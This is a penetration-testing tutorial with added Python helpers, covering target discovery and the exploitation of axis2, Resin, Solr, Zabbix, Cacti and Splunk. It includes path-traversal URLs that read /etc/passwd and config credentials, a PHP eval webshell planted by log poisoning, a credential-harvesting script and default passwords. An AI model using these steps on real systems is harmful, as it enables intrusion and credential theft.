Looking for breakthroughs in penetration testing
0x00 Target discovery
In day-to-day testing, and in watching how others work, it turns out that information gathering in the early stage plays the decisive role. In many cases you do not need to research a new vulnerability at all: if you collect enough targets up front, you only need to check them for a handful of common high-risk vulnerabilities.
Common approaches
1. Network segment information
1) Subdomains
If the domain has a DNS zone transfer (AXFR) vulnerability, that is ideal. Otherwise, brute-force the subdomains.
The tool I use most is dnsmap. Basic usage:
./dnsmap target-domain.com -w <your subdomain wordlist> -r <absolute path of the results file>
For a domain with wildcard resolution, use -i to ignore the wildcard address, otherwise every candidate name is reported as a hit. For example, if every nonexistent name under xxx.com resolves to 1.1.1.1, run:
./dnsmap xxx.com -w domain.txt -i 1.1.1.1 -r /tmp/result.txt
The results are written to the file given with -r (the screenshot of the output format is not reproduced here).
The default dnsmap build has a compilation problem. For the fix and further usage notes, see:
http://pan.baidu.com/s/1nt5HMw5
On top of the default dictionary, add names such as oa, zabbix, nagios, cacti, erp, sap and crm; many enterprises name hosts this way.
A penetration test usually looks for targets in the important business segments such as OA and mail. If some management backends have names of the form xx.admin.xxx.com, extend the search to third-level names under admin.xxx.com.
While checking a site I stumbled on the name ntp.nb.xxx.com, so I brute-forced nb.xxx.com as well. The result showed zabbix.nb.xxx.com exposed to the Internet on an old version, and the Zabbix SQL injection vulnerability could be used to gain access.
Subdomains can also be collected with search-engine syntax: site:xxx.com (add conditions such as inurl: and intitle: to get more results).
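As an added example (not from the original article), here is the same brute force done in Python instead of dnsmap, with the wildcard problem handled automatically: a few random labels are resolved first and whatever they return is ignored, which is what -i does by hand, and a hit like ntp.nb.xxx.com yields the intermediate zone nb.xxx.com to brute-force next. The resolver is injectable; the FAKE_ZONE data is constructed so the script runs offline.

```python
import random
import socket
import string
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, Iterable, List, Set

Resolver = Callable[[str], Set[str]]

# Wordlist in the spirit of the advice above: ops/monitoring/business names enterprises commonly use.
DEFAULT_WORDS: List[str] = [
    "www", "mail", "oa", "zabbix", "nagios", "cacti", "erp", "sap", "crm",
    "admin", "ntp", "vpn", "test", "dev",
]


def system_resolve(name: str) -> Set[str]:
    """Resolve a name to its IPv4 addresses with the system resolver; empty set if it does not exist."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(name, None, socket.AF_INET)}
    except socket.gaierror:
        return set()


def wildcard_ips(domain: str, resolve: Resolver = system_resolve, probes: int = 2) -> Set[str]:
    """Resolve random labels under the domain. Any address they return is a wildcard answer
    and must be ignored (the manual equivalent is dnsmap -i)."""
    ips: Set[str] = set()
    for _ in range(probes):
        label = "".join(random.choices(string.ascii_lowercase + string.digits, k=16))
        ips |= resolve(f"{label}.{domain}")
    return ips


def brute_subdomains(domain: str, words: Iterable[str] = DEFAULT_WORDS,
                     resolve: Resolver = system_resolve, ignore: Iterable[str] = (),
                     workers: int = 20) -> Dict[str, Set[str]]:
    """Return {name: {ips}} for every word that resolves to something other than a wildcard/ignored IP."""
    ignored = set(ignore) | wildcard_ips(domain, resolve)
    names = [f"{word}.{domain}" for word in words]
    found: Dict[str, Set[str]] = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for name, ips in zip(names, pool.map(resolve, names)):
            real = ips - ignored
            if real:
                found[name] = real
    return found


def expand_parents(found_names: Iterable[str], domain: str) -> Set[str]:
    """From hits like ntp.nb.xxx.com derive the intermediate zones (nb.xxx.com) worth brute-forcing next."""
    parents: Set[str] = set()
    suffix = "." + domain
    for name in found_names:
        if not name.endswith(suffix):
            continue
        parent = name.split(".", 1)[1]
        if parent != domain:
            parents.add(parent)
    return parents


# Constructed resolver standing in for a wildcard zone: three real hosts, everything else answers
# with 198.51.100.1, so an unfiltered brute force would report every word as a hit.
FAKE_ZONE = {
    "www.example.com": {"203.0.113.10"},
    "mail.example.com": {"203.0.113.20"},
    "zabbix.example.com": {"203.0.113.30"},
}


def fake_resolve(name: str) -> Set[str]:
    return set(FAKE_ZONE.get(name, {"198.51.100.1"}))


if __name__ == "__main__":
    hits = brute_subdomains("example.com", resolve=fake_resolve)
    for host, addrs in sorted(hits.items()):
        print(host, ",".join(sorted(addrs)))
    print("next zones to brute-force:", expand_parents(hits, "example.com"))
```

Against a real domain pass `resolve=system_resolve` (the default) and a larger wordlist; the wildcard probe runs once per zone, so call brute_subdomains again on each zone returned by expand_parents.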
2) AS number
Using jwhois:
yum install -y jwhois
Run
whois -h asn.shadowserver.org origin 1.1.1.1
to get the AS number of the organization that owns the IP, then run
whois -h asn.shadowserver.org prefix <AS number>
to get the prefixes (network segments) announced by that AS.
Note: generally only large enterprises have their own AS number, and one enterprise may have several.
3) DNS
4) SPF records (the domain's SPF TXT record lists the hosts and IP ranges allowed to send its mail, which often reveals further segments)
How to identify CDN addresses?
If a CDN IP is mistakenly added to the target list, manual effort is wasted on it. The simplest check is to ping the host from multiple locations, for example with
http://ping.chinaz.com/
If different locations get different IP addresses, the name is almost certainly served by a CDN.
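The AS prefix lookup, the SPF record and the CDN check above all produce or consume IP ranges. The Python below is an added example, not part of the original article: it collects ranges from a Shadowserver prefix reply and from an SPF include chain, then uses them to decide whether the addresses returned by multi-location pings belong to the organization or to a CDN. The Shadowserver reply format (pipe-separated with the AS number first; one CIDR per line) and the TXT records are constructed sample data and an assumption about the format; in a real run the text would come from the whois commands above and from TXT lookups.

```python
import ipaddress
from typing import Callable, Iterable, List, Optional, Set, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]

# Constructed replies from the Shadowserver whois service (format assumed, see lead-in).
ORIGIN_REPLY = "64496 | 203.0.113.0/24 | EXAMPLE-AS | ZZ | example.com | Example Corp"
PREFIX_REPLY = "203.0.113.0/24\n198.51.100.0/24\n"

# Constructed TXT records standing in for DNS lookups of the SPF chain.
SPF_TXT = {
    "example.com": "v=spf1 ip4:203.0.113.0/24 ip4:192.0.2.25 include:_spf.example.net a mx -all",
    "_spf.example.net": "v=spf1 ip4:198.51.100.0/25 ip6:2001:db8::/32 ~all",
}


def parse_origin_asn(reply: str) -> str:
    """AS number from the first field of a 'whois -h asn.shadowserver.org origin <ip>' reply."""
    return reply.split("|")[0].strip()


def parse_prefixes(reply: str) -> List[Network]:
    """CIDR prefixes from a 'whois -h asn.shadowserver.org prefix <asn>' reply, one per line."""
    return [ipaddress.ip_network(line.strip(), strict=False)
            for line in reply.splitlines() if line.strip()]


def spf_networks(domain: str, lookup: Callable[[str], Optional[str]],
                 _seen: Optional[Set[str]] = None) -> Set[Network]:
    """Collect ip4:/ip6: ranges from an SPF record, following include: and redirect= (at most
    10 domains in total, mirroring the SPF lookup limit). The a/mx mechanisms would need
    A/MX lookups and are left out here."""
    seen = _seen if _seen is not None else set()
    if domain in seen or len(seen) >= 10:
        return set()
    seen.add(domain)
    record = lookup(domain)
    nets: Set[Network] = set()
    if not record or not record.startswith("v=spf1"):
        return nets
    for term in record.split()[1:]:
        mech = term.lstrip("+-~?")  # drop the qualifier
        if mech.startswith(("ip4:", "ip6:")):
            nets.add(ipaddress.ip_network(mech[4:], strict=False))
        elif mech.startswith("include:"):
            nets |= spf_networks(mech[len("include:"):], lookup, seen)
        elif mech.startswith("redirect="):
            nets |= spf_networks(mech[len("redirect="):], lookup, seen)
    return nets


def find_range(ip: str, nets: Iterable[Network]) -> Optional[Network]:
    """The first collected range containing ip, or None if it is outside the organization's space."""
    addr = ipaddress.ip_address(ip)
    for net in nets:
        if addr in net:  # False when address and network families differ
            return net
    return None


def looks_like_cdn(ips_from_vantage_points: Iterable[str], org_nets: Iterable[Network]) -> bool:
    """The multi-location ping heuristic: pings from several places return different addresses
    and none of them lies in the organization's own ranges."""
    ips = set(ips_from_vantage_points)
    nets = list(org_nets)
    return len(ips) > 1 and all(find_range(ip, nets) is None for ip in ips)


def org_ranges() -> Set[Network]:
    """Union of the AS prefixes and the SPF ranges from the constructed data."""
    return set(parse_prefixes(PREFIX_REPLY)) | spf_networks("example.com", SPF_TXT.get)


if __name__ == "__main__":
    print("ASN:", parse_origin_asn(ORIGIN_REPLY))
    for net in sorted(org_ranges(), key=str):
        print("range:", net)
    print("CDN?", looks_like_cdn(["104.16.1.1", "104.16.2.2"], org_ranges()))
```

A single address seen from every location is not proof of a direct connection either (some CDNs anycast one IP); the point of the range check is that an address inside the organization's own prefixes is worth scanning regardless.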
2. Use whatweb to find web portals
Usage:
./whatweb 1.1.1.1/24 --log-brief=output_file (see the usage instructions for details)
By default only port 80 is identified. To identify port 8080 as well, add --url-suffix=":8080".
You can then search the results by title, CMS and other fields for targets. A typical find is a site running an old nginx with the parsing vulnerability (a request such as /path/file.jpg/x.php is handed to PHP, which executes file.jpg as PHP). The affected versions are all of 0.5.x and 0.6.x, 0.7 <= 0.7.65 and 0.8 <= 0.8.37.
An example:
While testing an enterprise, batch fingerprinting with whatweb turned up a site running an old nginx with the parsing vulnerability. The homepage was blank, so the directory structure was brute-forced, which found a .bash_history file.
The shell history showed that an archive had been created and stored in the web directory.
Downloading the archive revealed a log file that records the User-Agent of each request.
Using the Firefox plug-in User Agent Switcher, the User-Agent was changed to a one-line PHP shell. Once that string had been written into the log, the parsing vulnerability (requesting the log file with /x.php appended) executed it as PHP and gave a webshell directly.
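The chain above leaves two traces in the log itself: a PHP open tag in the User-Agent (the poisoning) and a request for a non-script file with /x.php appended (the trigger). The detector below is an added example, not from the original article; it parses combined-format access log lines, flags both patterns, and reports the client IPs that did both. The log lines are constructed.

```python
import re
from typing import Dict, Iterable, List, Set, Tuple

# Apache/nginx "combined" format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# PHP open tags as they appear in a poisoned field (one-line shell, <?= short echo, ...).
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# A static-looking file (log, image, archive, ...) followed by /anything.php: the request shape
# that makes the parsing vulnerability execute that file as PHP.
PARSE_ABUSE_RE = re.compile(
    r"\.(?:log|txt|jpg|jpeg|png|gif|bmp|zip|rar|tar|gz|html?)/[^/?]*\.php(?:[?/]|$)", re.IGNORECASE
)

Finding = Tuple[str, str, str]  # (client ip, reason, evidence)


def scan_line(line: str) -> List[Finding]:
    """Findings for one log line; unparseable lines are skipped rather than raising."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings: List[Finding] = []
    for field in ("ua", "referer"):
        if PHP_TAG_RE.search(m.group(field)):
            findings.append((m.group("ip"), f"php-tag-in-{field}", m.group(field)))
    if PARSE_ABUSE_RE.search(m.group("path")):
        findings.append((m.group("ip"), "parse-vuln-request", m.group("path")))
    return findings


def scan_lines(lines: Iterable[str]) -> List[Finding]:
    out: List[Finding] = []
    for line in lines:
        out.extend(scan_line(line))
    return out


def poison_then_trigger(findings: Iterable[Finding]) -> Set[str]:
    """Client IPs that both planted a PHP tag and issued a parse-vuln request: the full chain."""
    by_ip: Dict[str, Set[str]] = {}
    for ip, reason, _ in findings:
        kind = "php-tag" if reason.startswith("php-tag-in-") else reason
        by_ip.setdefault(ip, set()).add(kind)
    return {ip for ip, kinds in by_ip.items() if {"php-tag", "parse-vuln-request"} <= kinds}


# Constructed log excerpt: a poisoning request, the trigger request, and two benign lines.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2013:13:55:36 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2013:13:55:40 +0800] "GET /robots.txt HTTP/1.1" 200 24 "-" "<?php @eval($_POST['c']); ?>"
203.0.113.7 - - [10/Oct/2013:13:55:45 +0800] "GET /logs/access.log/x.php HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2013:13:56:01 +0800] "GET /images/logo.jpg HTTP/1.1" 200 8192 "http://www.example.com/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = scan_lines(SAMPLE_LOG.splitlines())
    for ip, reason, evidence in found:
        print(f"{ip} {reason}: {evidence}")
    print("full chain from:", poison_then_trigger(found))
```

nginx writes a literal double quote in a header as \x22, so a payload using double quotes still fits the regex; what the scanner cannot see is a payload that arrived through a field the log format does not record.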
3. Use nmap to find exposed services
See the manual for full details. The commonly used commands are below (add -P0, now spelled -Pn, only when needed: if ICMP ping is not blocked, leaving it out makes the scan faster)
./nmap -sT -sV 1.1.1.1/24 -P0 -oN /tmp/port_result.txt --open
When there are only a few IPs, scan all ports and collect basic information:
./nmap -sT -sV -p 1-65535 1.1.1.1 -P0 -A
With nmap we find web services on common ports such as 80/443/8080, plus the services that are frequently misconfigured, such as
873 (rsync without authentication), 21 (FTP anonymous login), 11211 (memcached without authentication) and 27017 (MongoDB without authentication). Do not give up on unfamiliar services: search exploit-db and similar sites for known vulnerabilities, and you may well find a direct RCE. (In many cases I also search WooYun, whose reports are real-world examples and more direct.)
4. Search engines for admin backends and important systems
Common search syntax: site:xxx.com inurl:login
The inurl: value can be varied freely; common keywords are admin and manage, or use intitle: with words such as "management" and "login". On some sites most results are false positives from one sub-site, such as a blog or a Q&A site; use the minus operator to exclude them. For example, in Google search
site:baidu.com inurl:login -zhidao
to drop zhidao-related results, or in Baidu enter
site:baidu.com inurl:login -site:zhidao.baidu.com
Example reference: WooYun: a complete web reconnaissance of Suning Tesco (many screenshots)
5. Build a compact path dictionary
Make a small dictionary of the common paths that are both frequently present and high risk, such as /invoker/JMXInvokerServlet and /wwwroot.zip, and sweep it across all the domains collected earlier. If one of these exists, you are likely to get in.
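An added example (not from the original article) of such a sweep in Python. Besides the two paths named above it includes a few more of the same kind, which are assumptions, and it fetches a random nonexistent path first so hosts that answer 200 for everything (soft 404) do not flood the results with false hits. The fetcher is injectable and the FAKE_SITE responses are constructed so the script runs offline.

```python
import random
import string
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, Iterable, List, Optional, Tuple
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# The two paths from the text plus a few assumed additions of the same kind.
HIGH_RISK_PATHS = [
    "/invoker/JMXInvokerServlet", "/wwwroot.zip", "/.svn/entries", "/.bash_history",
    "/axis2/services/listServices", "/solr/admin/", "/zabbix/", "/cacti/index.php",
]

Response = Tuple[int, bytes]  # (HTTP status, body prefix)
Fetcher = Callable[[str], Optional[Response]]
Hit = Tuple[str, int, int]    # (url, status, body length)


def urllib_fetch(url: str, timeout: float = 5.0) -> Optional[Response]:
    """Plain urllib fetcher: HTTP errors are still responses, network failures become None."""
    try:
        with urlopen(Request(url, headers={"User-Agent": "Mozilla/5.0"}), timeout=timeout) as resp:
            return resp.getcode(), resp.read(65536)
    except HTTPError as err:
        return err.code, err.read(65536)
    except (URLError, OSError, ValueError):
        return None


def baseline(base: str, fetch: Fetcher) -> Optional[Response]:
    """Fetch a path that cannot exist, to learn what this host's 'not found' answer looks like."""
    junk = "/" + "".join(random.choices(string.ascii_lowercase, k=12)) + ".zip"
    return fetch(base.rstrip("/") + junk)


def is_soft_404(resp: Response, soft: Optional[Response]) -> bool:
    """Same status and roughly the same length as the baseline: most likely the generic page."""
    if soft is None:
        return False
    status, body = resp
    soft_status, soft_body = soft
    return status == soft_status and abs(len(body) - len(soft_body)) <= max(32, len(soft_body) // 20)


def sweep_host(base: str, paths: Iterable[str] = HIGH_RISK_PATHS, fetch: Fetcher = urllib_fetch,
               workers: int = 10) -> List[Hit]:
    """Paths that exist and do not look like the soft-404 page. 401/403 mean the resource is there
    but protected; 500 often means the handler exists and choked on a plain GET."""
    soft = baseline(base, fetch)
    urls = [base.rstrip("/") + path for path in paths]
    hits: List[Hit] = []
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for url, resp in zip(urls, pool.map(fetch, urls)):
            if resp is None:
                continue
            status, body = resp
            if status in (200, 401, 403, 500) and not is_soft_404(resp, soft):
                hits.append((url, status, len(body)))
    return hits


def sweep_hosts(hosts: Iterable[str], paths: Iterable[str] = HIGH_RISK_PATHS,
                fetch: Fetcher = urllib_fetch) -> Dict[str, List[Hit]]:
    """Run the sweep over every collected host; the paths list is materialised once."""
    path_list = list(paths)
    return {host: sweep_host(host, path_list, fetch) for host in hosts}


# Constructed host that answers 200 with a generic page for anything unknown (soft 404).
SOFT_PAGE = (200, b"<html><body>Sorry, that page was not found.</body></html>")
FAKE_SITE = {
    "/wwwroot.zip": (200, b"PK\x03\x04" + b"\x00" * 600),
    "/invoker/JMXInvokerServlet": (200, b"\xac\xed\x00\x05" + b"\x00" * 300),
    "/zabbix/": (200, b"<html><head><title>Zabbix</title></head><body>" + b"x" * 2000 + b"</body></html>"),
    "/cacti/index.php": (404, b"Not found"),
}


def fake_fetch(url: str) -> Optional[Response]:
    return FAKE_SITE.get(url[len("http://203.0.113.5"):], SOFT_PAGE)


if __name__ == "__main__":
    for host, hits in sweep_hosts(["http://203.0.113.5"], fetch=fake_fetch).items():
        for url, status, size in hits:
            print(host, url, status, size)
```

The length tolerance is deliberately loose because soft-404 pages usually echo the requested path; a host whose baseline itself is a 403 is handled the same way, since a 403 on every path carries no information.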
0x01 Exploitation
Several common system exploitation methods are listed here.
1. Admin backends
When an admin backend or important system is found during the process above, the following checks are usually done:
1) A full AWVS scan (frequently produces unexpected finds)
2) Directory brute force
3) Password brute force. When admin fails, the password is not necessarily wrong; very often it is the username that is wrong. Use every method you can think of to find usernames: JS and CSS files, HTML source comments, .svn directory leaks and so on. Add variants of the system name, the domain name and similar information to the password dictionary.
4) Information from HTML source, JS and other files. Some developers leave management URLs as comments in the HTML source, and management interface paths are written in JS; with luck they can be accessed directly without authentication.
5) Parameter value brute force. Backend login pages written with some frameworks have the form xx.com/?c=login; collect common parameter values such as index, main, upload, edit and adduser and try them. With luck you can perform unauthorized operations directly.
2. axis2
File read (path traversal):
www.xxx.com/axis2/services/listServices lists all services
www.xxx.com/axis2/services/xxxxx?xsd=../conf/axis2.xml (xxxxx can be any service name) reads the axis2 configuration file, which contains the admin console account
www.xxx.com/axis2/axis2-admin/ log in to the admin console
Code execution by deploying a service file from the admin console:
use Metasploit (the exploit/multi/http/axis2_deployer module uploads a service through the console and runs code)
Resin
File read:
http://www.xxx.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
The same parameter also accepts a URL,
http://www.xxx.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://1.1.1.1
which gives SSRF.
Solr sensitive information leakage
http://xxx.org:8080/solr/admin/file/?file=solrconfig.xml
Look through the XML files it references for the data-import configuration (data-import.xml), then fetch
http://xxx.org:8080/solr/admin/file/?file=data-import.xml
to get the database password.
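Both the axis2 and the Solr reads end with a configuration file that holds credentials. The Python below is an added example, not from the original article: it builds the URLs given above and pulls the console account out of axis2.xml (stored as userName/password parameters; admin/axis2 is the shipped default) and the data source settings out of the DataImportHandler config. The XML samples are constructed in the shape of the real files, and the fetch function is injectable, so nothing here touches a host.

```python
import xml.etree.ElementTree as ET
from typing import Callable, Dict, List, Optional


def axis2_config_url(base: str, service: str) -> str:
    """The traversal URL from the text: any service name works, xsd walks up to conf/axis2.xml."""
    return f"{base.rstrip('/')}/axis2/services/{service}?xsd=../conf/axis2.xml"


def solr_file_url(base: str, filename: str) -> str:
    return f"{base.rstrip('/')}/solr/admin/file/?file={filename}"


def axis2_admin_credentials(axis2_xml: str) -> Dict[str, str]:
    """Admin console account from axis2.xml; any <parameter> anywhere in the tree is considered."""
    root = ET.fromstring(axis2_xml)
    params = {p.get("name"): (p.text or "").strip() for p in root.iter("parameter")}
    return {key: params[key] for key in ("userName", "password") if key in params}


def solr_datasource_credentials(data_import_xml: str) -> List[Dict[str, str]]:
    """Connection details of every <dataSource> in a DataImportHandler config."""
    root = ET.fromstring(data_import_xml)
    return [
        {key: ds.get(key) for key in ("driver", "url", "user", "password") if ds.get(key) is not None}
        for ds in root.iter("dataSource")
    ]


def harvest_axis2(base: str, service: str, fetch: Callable[[str], Optional[str]]) -> Dict[str, str]:
    """Fetch axis2.xml through the traversal and return the account, or {} if the read failed."""
    body = fetch(axis2_config_url(base, service))
    if not body:
        return {}
    try:
        return axis2_admin_credentials(body)
    except ET.ParseError:
        return {}


# Constructed samples in the shape of the real files (not retrieved from any host).
AXIS2_XML = """<axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="hotupdate">false</parameter>
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
    <transportReceiver name="http" class="org.apache.axis2.transport.http.SimpleHTTPServer">
        <parameter name="port">8080</parameter>
    </transportReceiver>
</axisconfig>"""

DATA_IMPORT_XML = """<dataConfig>
  <dataSource type="JdbcDataSource" driver="com.mysql.jdbc.Driver"
              url="jdbc:mysql://10.0.0.5/app" user="app" password="S3cret!"/>
  <document>
    <entity name="item" query="select id, name from item"/>
  </document>
</dataConfig>"""


def fake_fetch(url: str) -> Optional[str]:
    """Stand-in for an HTTP GET: only the axis2 traversal URL of the sample host answers."""
    return AXIS2_XML if url == axis2_config_url("http://www.xxx.com", "Version") else None


if __name__ == "__main__":
    print(harvest_axis2("http://www.xxx.com", "Version", fake_fetch))
    print(solr_datasource_credentials(DATA_IMPORT_XML))
```

A non-default axis2 account is still worth a brute force against the console, and a Solr data source URL frequently points at an internal database host that the later intranet phase can reuse.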
Hudson (similar to Jenkins)
See "A Sohu application with remote Groovy code execution!" http://www.bkjia.com/Article/201303/197476.html
Zenoss
Google keyword: intitle:"Zenoss Login"
Default password: admin/zenoss
Exploitation reference:
"From a default password to the Youku and Tudou intranet (dangerous, please fix as soon as possible)" http://www.bkjia.com/Article/201304/206243.html
Zabbix
Backend: http://www.xxx.com/zabbix
Default password: admin/zabbix
Google: inurl:zabbix/dashboard.php
For exploitation see WooYun: improper operation and maintenance of Zabbix leads to arbitrary command execution.
Zabbix also has a number of SQL injection vulnerabilities: http://drops.wooyun.org/papers/680
Cacti
Default login path: www.xxx.com/cacti/index.php
Default password: admin/admin
For the exploitation method see WooYun: Cacti post-login command execution vulnerability.
Splunk
Default backend address:
http://xxx.com:8000/zh-CN/account/login?return_to=%2Fzh-CN%2F
Default account admin/changeme, default port 8000
Manager > Apps > Install app from file: upload a crafted app to get a shell
Metasploit module:
exploit/multi/http/splunk_upload_app_exec
0x02 Closing
Two comprehensive WooYun articles are recommended:
1. Operations security as seen from WooYun
http://drops.wooyun.org/papers/410
2. Attacking Java Web applications [7]: Server [1]
http://drops.wooyun.org/tips/604